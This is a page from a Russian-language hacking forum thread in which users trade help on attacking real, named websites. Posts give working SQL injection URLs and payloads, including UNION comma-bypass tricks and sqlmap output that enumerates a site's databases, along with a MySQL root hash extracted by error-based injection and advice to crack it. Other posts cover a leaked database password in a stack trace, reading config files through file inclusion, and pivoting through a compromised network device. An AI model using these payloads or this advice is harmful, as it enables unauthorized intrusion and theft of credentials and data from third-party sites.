Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    и еще вопрос что с этим делать, хех
    No se puede ejecutar el query, error: XPATH syntax error: ':root:*4F23645A18ABD4FACEB00C9BC'[/QUOTE]
    Это логин и пароль.Даже имя root само за себя говорит .
    Как я понял ты через extractvalue вывоил?Там выводи в 31 символ наскоко я помню.
    А hash на MySQL 5 в 40 символов .
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Используйте функцию mid() для вывода первой части, а затем второй части пароля
     
    _________________________
    SaNDER likes this.
  3. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    http://dev.web3.6893-2.whserv.de/index.php?id=-347 .
    Как обойти TYPO3?Тут версия 6.2.25

    ------------------------------------------------------------
    Подключился через SH к айпи сервера . Как curl закачать ?
     
    #1263 SaNDER, 18 Aug 2016
    Last edited: 18 Aug 2016
  4. demafly76

    demafly76 New Member

    Joined:
    14 Aug 2016
    Messages:
    17
    Likes Received:
    2
    Reputations:
    0
    да через extractvalue, а вот про вывод в 31 символ тут я не догнал с этим
     
  5. demafly76

    demafly76 New Member

    Joined:
    14 Aug 2016
    Messages:
    17
    Likes Received:
    2
    Reputations:
    0
    ok, спс! получилось, root::*4F23645A18ABD4FACEB00C9BCC5C1C238396B5E2
    реально пароль вытащить?
     
  6. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Пробуйте брутеть по словарикам, грубым перебором, тема https://forum.antichat.ru/threads/218185/ - Софт для брута или чекайте на паблик сервисах, на наличие уже сбрученых паролей
     
    _________________________
  7. myblitz

    myblitz New Member

    Joined:
    18 Aug 2016
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Чем можно заменить(обойти) запятую при запросе ( UNION SELECT 1,2,3.... )

    на сервере код:
    Code:
    $cookie=explode(',', $cookie);
     
  8. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Джоин
     
    myblitz likes this.
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    union (select*from(select 1)a1 join(select 2)a2 join (select 3)a3
     
    _________________________
    myblitz likes this.
  10. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Есть доступ к модему в сети A. В сети A есть SQL-сервер, который подключения с чужих IP не принимает. Модель модема в сети A - APC7932. Возможно ли поднять прокси/etc. на модеме, чтобы подключиться к базе?
     
  11. [XOR]

    [XOR] New Member

    Joined:
    24 Jul 2012
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Нашел на сайте SQL Injection:
    http://site.ru/search/?num=13750-01a'
    с такой ошибкой:
    Database error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
    но не могу определить количество столбцов. Через GROUP BY определить никак не получается. Делал так:
    http://site.ru/search/?num=13750-01a' GROUP BY 2 --
    Database error: Unknown column '2' in 'group statement'
    если выводится такая ошибка, значит количество столбцов меньше 2, что странно. Естественно далее делаю так:
    http://site.ru/search/?num=13750-01a' GROUP BY 1 --
    Database error: Can't group on 'cnt'
    что за ошибка такая? Гугл не помог.

    А вот
    ORDER BY работает немного по другому:
    http://site.ru/search/?num=13750-01a' ORDER BY 2 --
    Database error: Unknown column '2' in 'order clause'
    тут все как и в первом случае. А если сделать так:
    http://site.ru/search/?num=13750-01a' ORDER BY 1 --
    то никаких ошибок нет и все отображается нормально, в отличии от первого варианта с GROUP BY.

    И чтобы окончательно убедиться делал так:

    http://site.ru/search/?num=13750-01a' UNION SELECT 1 --
    Database error: The used SELECT statements have a different number of columns
    причем пробовал указывать в UNION SELECT несколько столбцов, вплоть до 10, но ошибка не меняется.

    В общем, требуется помощь.
     
  12. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    union+select+concan(user())
    Вариантов много может быть.
    Пробуйте лучше еррор
     
  13. korneev

    korneev New Member

    Joined:
    24 Aug 2016
    Messages:
    13
    Likes Received:
    3
    Reputations:
    2
    APC7932 - гугл выдает что это ИБП стоечный. Если и вправду ИБП, то посмотри, можно ли там включить доступ по SSH. Если можно, то законекться к нему с параметром -D <socksport>
     
  14. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Включил SSH, вырубился Telnet. SSH тоже не работает. Прогуглив узнал, что прошивка у этих моделей бажная. Так что все, кто встретят такие модели - поосторожней. Все равно спасибо!
     
  15. MaxxWell

    MaxxWell Banned

    Joined:
    5 Jan 2016
    Messages:
    32
    Likes Received:
    1
    Reputations:
    0
    http://sirus.su/in.php Что можно извлечь полезного ? sirus.su?robots.txt?file=config.php можно ли так прочитать данный файл, где то я видел видео на эту тему.
     
  16. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    LFI через phpinfo() разве что.

    но нужен инклуд.
     
  17. MaxxWell

    MaxxWell Banned

    Joined:
    5 Jan 2016
    Messages:
    32
    Likes Received:
    1
    Reputations:
    0
    А где ж его взять то?))
     
  18. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Имеется сайт site.ru/ajax/Areas/Product/
    Если в cookies поставить ' в timezone, то выдает следующее:

    Code:
    Exception Object
    (
        [message:protected] => DateTimeZone::__construct(): Unknown or bad timezone (')
        [string:Exception:private] =>
        [code:protected] => 0
        [file:protected] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
        [line:protected] => 164
        [trace:Exception:private] => Array
            (
                [0] => Array
                    (
                        [file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
                        [line] => 164
                        [function] => __construct
                        [class] => DateTimeZone
                        [type] => ->
                        [args] => Array
                            (
                                [0] => '
                            )
    
                    )
    
                [1] => Array
                    (
                        [file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
                        [line] => 141
                        [function] => checkConnect
                        [class] => MYSQL_DB
                        [type] => ->
                        [args] => Array
                            (
                            )
    
                    )
    
                [2] => Array
                    (
                        [file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php
                        [line] => 74
                        [function] => __construct
                        [class] => MYSQL_DB
                        [type] => ->
                        [args] => Array
                            (
                                [0] => site_work
                                [1] => 01cNWgm3qbNeRWn6uHMUzOPI3CRVJZJ
                                [2] => satom
                                [3] => 127.0.0.1
                                [4] => 3307
                            )
    
                    )
    
                [3] => Array
                    (
                        [file] => /var/www/site/data/releases/sources/3.4.40/model/DefaultModel.class.php
                        [line] => 75
                        [function] => DB
                        [class] => MYSQL_DB
                        [type] => ::
                        [args] => Array
                            (
                            )
    
                    )
    
                [4] => Array
                    (
                        [file] => /var/www/site/data/releases/sources/3.4.40/model/MailQueueModel.class.php
                        [line] => 22
                        [function] => __construct
                        [class] => DefaultModel
                        [type] => ->
                        [args] => Array
                            (
                                [0] => mail_queue
                            )
    
                    )
    
                [5] => Array
                    (
                        [file] => /var/www/site/data/releases/sources/3.4.40/oop/mail/QueueMailer.class.php
                        [line] => 39
                        [function] => __construct
                        [class] => MailQueueModel
                        [type] => ->
                        [args] => Array
                            (
                            )
    
                    )
    
                [6] => Array
                    (
                        [file] => /var/www/site/data/releases/sources/3.4.40/oop/SendMail.class.php
                        [line] => 56
                        [function] => send
                        [class] => QueueMailer
                        [type] => ->
                        [args] => Array
                            (
                                [0] => [email protected]
                                [1] => Timezone Error
                                [2] => 
    
    Здесь может быть sql-injection или это просто вывод ошибки такой?
     
  19. MaxxWell

    MaxxWell Banned

    Joined:
    5 Jan 2016
    Messages:
    32
    Likes Received:
    1
    Reputations:
    0
    Как подобрать если не выводит кол-во?
    Code:
    http://www.premium-network.ru/index.php?id=-tariffs_internet%27+order+by+100+--+
     
  20. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Попробуй другой URL))
    Code:
    http://www.premium-network.ru/index.php?id=add&used=faq&s=3
    Code:
    ---
    Parameter: s (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=add&used=faq&s=3' AND 9304=9304 AND 'HJyF'='HJyF
    
        Type: error-based
        Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
        Payload: id=add&used=faq&s=3' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176706a71,(SELECT (ELT(3147=3147,1))),0x7171786271,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'xSeN'='xSeN
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=add&used=faq&s=3' AND SLEEP(5) AND 'PmOg'='PmOg
    ---
    
    
    web server operating system: FreeBSD
    web application technology: PHP 5.4.26, Apache 2.2.27
    back-end DBMS: MySQL >= 5.5
    banner:    '5.5.37'
    current user:    'forumpt@localhost'
    current database:    'new_premium'
    current user is DBA:    False
    database management system users [1]:
    [*] 'forumpt'@'localhost'
    
    available databases [3]:
    [*] forumpt
    [*] information_schema
    [*] new_premium
     
    MaxxWell likes this.